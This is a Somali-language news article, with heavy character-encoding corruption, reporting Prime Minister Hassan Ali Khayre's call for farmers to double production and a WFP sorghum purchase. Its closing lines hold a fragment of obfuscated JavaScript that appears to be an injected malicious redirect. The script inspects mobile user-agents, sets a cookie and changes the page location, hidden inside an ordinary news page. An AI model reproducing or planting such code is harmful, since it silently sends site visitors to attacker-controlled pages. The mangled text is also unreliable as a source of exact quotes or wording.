Raa��iisul wasaaraha xukuumadda federaalka Soomaaliya, mudane Xasan CaliA�Khayre, ayaa beeralayda Soomaaliyeed ugu baaqay in ay laba jibbaaraanA�tacabka beeraha si ay usoo saaraan cunnno ku filan dalka, mustaqbalka ayA�ugu dhoofiyaan dunida.
Raa��iisul wasaare Xasan Cali Khayre oo ka qayb galay munaasabadda xuskaA�maalinta beeralayda Soomaaliyeed oo lagu qabtay Muqdisho ayaa sheegay inA�beeralaydu ay hoggaan u ahaayeen horumarinta dhaqaalaha dalka, xilligaannaA�ay muhiim tahay in ay soo nooleeyaan dawrkooda, qaybna ka qaataan soo
celinta sharafka iyo karaamada ummadda Soomaaliyeedoo ku xiran iskufilnaansho dhaqaale.
a�?Dawladdeennu waxa ay ka shaqaysaa soo celinta sharafka iyo karaamada
ummadda Soomaaliyeed. Soo celinta sharaftu waa in aadan tuugsan, si aadan uA�tuugsanna waa in aad wax soo saartaaa�?ayuu yiri raa��iisul wasaare Xasan CaliA�Khayre
a�?Marka aad isku filantahay ayaad gaari kartaa goa��aan xor ah oo aad kulaA�dhaqmi karto dunidaa�? ayuu raaciyay raa��iisul wasaare Khayre.
Raa��iisul wasaare Khayre ayaa soo dhaweeyay heshiis haya��adda cunnadaA�adduunyada (WFP) ay 4,000 metric ton oo Ganley ah uga iibsnayso beeralaydaA�Soomaaliyeed, waxa uuna sheegay in ay tahay bilaaw wanaagsan, hadiiA�beeralaydu ay kordhiyaan tacabka beerahana ay heya��adaha gargaarkunaA�kordhinayaan iibssiga dalagga gudaha si ay ugu quudinayaan dadka gargaarkaA�u baahan ee ku nool dalalka dunida.
Hoos Ka Dhageyso Codka Ra’iisul Wasaaraha Soomaaliya:-
|nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

